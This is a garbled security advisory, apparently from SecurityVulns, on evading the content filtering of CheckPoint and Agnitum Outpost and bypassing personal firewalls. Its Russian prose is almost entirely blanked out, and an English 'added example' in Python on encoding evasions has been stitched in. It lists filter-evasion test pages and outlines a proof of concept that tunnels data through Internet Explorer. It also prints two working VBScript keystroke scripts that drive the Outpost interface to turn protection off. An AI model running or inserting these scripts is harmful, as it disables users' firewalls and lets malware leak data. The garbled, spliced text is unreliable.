Information Security




:     
:  
 :
 CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application Intelligence R55HFA09
 Microsoft Windows XP SP2
 Agnitum Outpost Pro 2.1.x
 Tiny Firewall Pro v6.0.100
 ZoneAlarm Pro with Web Filtering v4.5.594
 BlackICE PC Protection 3.6
 Kerio Personal Firewall 4.0
 WRQ ATGuard v3.2
:
 3APA3A, <[email protected]>, offtopic, <[email protected]>
           
   CheckPoint.      
 Checkpoint    ,   Agnitum    
 ""   .

  

</>
         -  
,                  
.       
            .  
       ,   
      .    ,     
 ,       ,
       .   
,    ,       
       .    , 
     .
<>
, Pedram?
< />

1. 

1.1       ?

           
.               
           ,
          OSI,        
  ,     
    DDoS  ...         
   .

  ,   ,   
,    ,       ,   5  .
  ,  ,      
  .            
  .
< />

              ?
            .    
                   
www.astalavista.com      .

<  ,  />

,             , 
        .       
  ,          
              
.           ,  
     Notepad.exe      
   .


 1.2        ?

         .  
            (
                )    
""        .    
      ,   ,
        ,   
    API.

          ,      
  ,      ,       
    .

 1.3      !    ?

        ,    .
  ,         Mozilla
,     $500      . 
Internet  Explorer           -   .
 - 500 ,  ,    
    .              
           .      
  .          , ,   
  .    ,   iDefense  
           .
    ,      .

<,  (),  />
</>

         ,   .
                .  
      freeware  , 
   .

<>

Full disclosure? Who believes in it...

 , :

-         
 (,    -   ).
-              
.
-       .

        .        .  
          .
   ,        
  .

<    />
<         />

2.    -   
____________________________________________________________
 :         .
 :              
             ,    
 -                 
 .


 2.1  

         
   :  Checkpoint      
,

Agnitum  Outpost  Pro     . 
       VBScript  JavaScript 
 ActiveX.

           [1]         WEB-,
    Internet Explorer  ,  
  (   ,      ).

 2.2  :

  2.2.1  http://www.security.nnov.ru/files/opossum/test1.html
         0x0B byte in the markup. [1].II.9

  2.2.2  http://www.security.nnov.ru/files/opossum/test2.html
         RFC2781 (UTF-16, little endian). [1].II.1

  2.2.3  http://www.security.nnov.ru/files/opossum/test3.html
         RFC2781 (UTF-16, big endian). [1].II.1

  2.2.4  http://www.security.nnov.ru/files/opossum/test4.gif
         [1].II.13

  2.2.5  http://www.security.nnov.ru/files/opossum/test5.gif
         Variation on 2.2.4.

  2.2.6  http://www.security.nnov.ru/files/opossum/test6.html
         0x00 byte in the markup. [1].II.9

  2.2.7  http://www.security.nnov.ru/files/opossum/test7.asp
         UTF-7 (charset in Content-Type). [1].II.2

  2.2.8  http://www.security.nnov.ru/files/opossum/test8.html
         Charset declared with Meta http-equiv. [1].II.2

  2.2.9  http://www.security.nnov.ru/files/opossum/test9.html
         CSS expression(); http-equiv (malware.com).

  2.2.10 http://www.security.nnov.ru/files/opossum/test10.html
         [1].II.15

  2.2.11 http://www.security.nnov.ru/files/opossum/test11.mht
         MHTML (RFC2557)
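The encoding tricks behind tests 2.2.1 through 2.2.11, as an added example that is not part of the original paper and not the code of the test pages at security.nnov.ru: one constructed page with a <script> element is rewritten the way each test does (a 0x0B or 0x00 byte in the tag name, UTF-16 with a BOM, UTF-7 announced in a meta http-equiv or in the Content-Type header, and an MHTML wrapper), a filter that matches the raw bytes misses every variant, and a filter that first decodes the document the way the browser will catches all of them. The sample page, the MIME boundary, the function names and the assumption that the browser still parses the tag with a stray NUL or VT byte in it (which is what the test pages rely on) are the example's own.

```python
"""Added example: encoding evasions from tests 2.2.1-2.2.11 against two filters."""
import base64
import codecs
import email
import re

# Constructed sample page; the thing a content filter wants to stop is the
# <script> element.
PAYLOAD = "<html><body><script>alert(1)</script></body></html>"


def make_variants():
    """Return {name: bytes}: the sample page rewritten as each test does."""
    v = {"plain": PAYLOAD.encode("ascii")}
    # 2.2.1 / 2.2.6: a 0x0B (VT) or 0x00 (NUL) byte inside the tag name. The
    # tests rely on the browser still seeing a <script> tag there (assumption).
    v["vt_in_tag"] = PAYLOAD.replace("<script", "<scr\x0bipt").encode("ascii")
    v["nul_in_tag"] = PAYLOAD.replace("<script", "<scr\x00ipt").encode("ascii")
    # 2.2.2 / 2.2.3: UTF-16 with a BOM (RFC 2781). Every ASCII character gets
    # a zero byte beside it, so the byte string b"<script" never occurs.
    v["utf16le"] = codecs.BOM_UTF16_LE + PAYLOAD.encode("utf-16-le")
    v["utf16be"] = codecs.BOM_UTF16_BE + PAYLOAD.encode("utf-16-be")
    # 2.2.8: UTF-7 announced by a meta http-equiv. "+ADw-" decodes to "<"
    # and "+AD4-" to ">"; hand-encoded so the escapes are guaranteed to appear.
    meta = '<meta http-equiv="Content-Type" content="text/html; charset=utf-7">'
    body = PAYLOAD.replace("<", "+ADw-").replace(">", "+AD4-")
    v["utf7_meta"] = (meta + body).encode("ascii")
    # 2.2.11: the page as an MHTML archive (RFC 2557); the HTML is a base64
    # MIME part, so no tag is visible in the raw bytes. Boundary is made up.
    b64 = base64.b64encode(PAYLOAD.encode("ascii")).decode("ascii")
    v["mhtml"] = (
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/related; boundary="opossum"\r\n\r\n'
        "--opossum\r\nContent-Type: text/html\r\n"
        "Content-Transfer-Encoding: base64\r\n\r\n" + b64 + "\r\n--opossum--\r\n"
    ).encode("ascii")
    return v


def naive_blocks(doc: bytes) -> bool:
    """A byte-signature filter: match the literal tag in the raw stream."""
    return b"<script" in doc.lower()


_CHARSET_RE = re.compile(rb"charset\s*=\s*[\"']?([\w-]+)", re.I)


def normalize(doc: bytes, content_type: str = "") -> str:
    """Decode the document the way the browser will before scanning it."""
    if doc.startswith(b"MIME-Version:"):
        # MHTML: unpack every non-multipart part and normalize each one.
        parts = []
        for part in email.message_from_bytes(doc).walk():
            if part.get_content_maintype() != "multipart":
                parts.append(normalize(part.get_payload(decode=True) or b"",
                                       part.get_content_type()))
        return "\n".join(parts)
    if doc.startswith(codecs.BOM_UTF16_LE):
        text = doc[2:].decode("utf-16-le", "replace")
    elif doc.startswith(codecs.BOM_UTF16_BE):
        text = doc[2:].decode("utf-16-be", "replace")
    else:
        # Charset from the HTTP Content-Type header (2.2.7) wins; otherwise
        # look for a meta http-equiv in the body (2.2.8).
        m = _CHARSET_RE.search(content_type.encode()) or _CHARSET_RE.search(doc)
        charset = m.group(1).decode().lower() if m else "latin-1"
        if charset in ("utf-7", "utf7"):
            text = doc.decode("utf-7", "replace")
        else:
            text = doc.decode("latin-1")
    # Drop the NUL and VT bytes of 2.2.1 / 2.2.6 before matching.
    return text.replace("\x00", "").replace("\x0b", "")


def normalized_blocks(doc: bytes, content_type: str = "") -> bool:
    """The same check run on the normalized text instead of the raw bytes."""
    return "<script" in normalize(doc, content_type).lower()
```

The 2.2.7 case is why the filter has to see the HTTP headers as well as the body: normalized_blocks(b"+ADw-script+AD4-", "text/html; charset=utf-7") is True, while the same bytes without the header string decode as Latin-1 and are passed.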

       . Outpost     .  
  Checkpoint  2.2.2, 2.2.3, 2.2.6, 2.2.8, 2.2.9, 2.2.10, 2.2.11.

 2.3  :

        Checkpoint   Agnitum. Checkpoint  
          R55HFA10.   
          2.2.1    2.2.10. 
  2.2.11  Checkpoint     
(      ,    ,  ). 
R55HFA10         2.2.11  . Agnitum
  2.2.1    2.2.7    2.5.   
     .

            ,     
.

3.        
 ____________________________________________________________
 :   ,     

  ,         ,   
   .

      , 
,          .
          ,    
         .   
     .

         ,   
   (, )     .
        
  DLL, WriteProcessMemory(), CreateRemoteThread()  ..  ..
       [2]  [3].

                
      .  , 
        API.
          ,      
                 
,        (, HTTP 
)       . ..
        Proxy,      . 
,           
    .

        .      ,   ,  
      CAT  (Client  Application  Trojaning).  
      .

    http://www.security.nnov.ru/files/opossum/CAT.zip   
  ,     .  
COM         (Internet Explorer).
         
            ,    
      ,           
(Proxy-  ..).       
HTTP,     Microsoft.

      ,    
    .        
      -  mail.ru.     ,
      ,        (   
                  ?),      on-line     
http://translate.google.com/translate?hl=en&u=www.security.nnov.ru   
  ,   ...    
    .
  
   CAT PoC   :

  -      COM-  Internet  Explorer        
  www.mail.ru.
  -  CAT     ,    
      .
  - CAT    "ready"  .
  -  20  CAT   ""   
    XXX.request (XXX -  ).
  -          CAT   ,   
     .
  -       .

      IE.Visible = true     .

      100    VBS. 
,     .

<     ? />

   ILOVEYOU      ,        ,
,            
.     Windows Scripting Hosts  
        WMI,      
 "".

        CAT.
    Outpost  2.5,       COM
.          
  CAT    Outpost 2.5.    
  .

:        IE      
 IE .

4.    
____________________________________________________________
 :   ,   

  Outpost

       ' The script drives the Outpost GUI with simulated keystrokes from
       ' Windows Script Host; no firewall API is involved.
       set WShell = CreateObject("WScript.Shell")

       ' Start (or bring up) the Outpost main window and wait for it.
       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 200
       ' Give keyboard focus to the window whose title starts with "Agnitum".
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 100
       ' F10 opens the menu bar; the arrow keys pick an item, ENTER runs it.
       WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
       WScript.Sleep 100
       ' Confirm the dialog that follows.
       WShell.SendKeys "{ENTER}"

  Outpost  "" 

       ' Same technique: keystrokes into the Outpost GUI. The Sleep values are
       ' the original ones and depend on how fast the window comes up.
       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 100
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 10
       ' F10 opens the menu bar; three LEFT presses move to the wanted menu.
       WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
       WScript.Sleep 10
       ' Four items down, then open the entry.
       WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
       WScript.Sleep 10
       ' "a" selects the item with accelerator A in the dialog; ENTER confirms.
       WShell.SendKeys "a{ENTER}"
       WScript.Sleep 10
       ' Back to the menu bar, one menu left, first item.
       WShell.SendKeys "{F10}{LEFT}{DOWN}"
       WScript.Sleep 10
       ' "n" selects the item with accelerator N.
       WShell.SendKeys "n"

5. .
____________________________________________________________
 :     

         ,
      ,   "".
            
,    - GeSWall [4](    
  ).        ,   
          
.          
         , 
   .     - 
         
        [5].  ,    
 100% .


<   ,   (),
    ( ) />

6. References:

[1] 3APA3A, "Bypassing content filtering software"
    http://www.security.nnov.ru/advisories/content.asp
[2] Firewall leak tester
    http://www.firewallleaktester.com/
[3] rattle, "Using Process Infection to Bypass Windows Software Firewalls", Phrack #62
    http://www.phrack.org/show.php?p=62&a=13
[4] GeSWall (General Systems Wall)
    http://www.securesize.com/
[5] offtopic, 3APA3A, "In front of front-end security"
    http://www.linuxchile.cl/docs.php?op=ver&id=65

<WARNING:        \>


© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod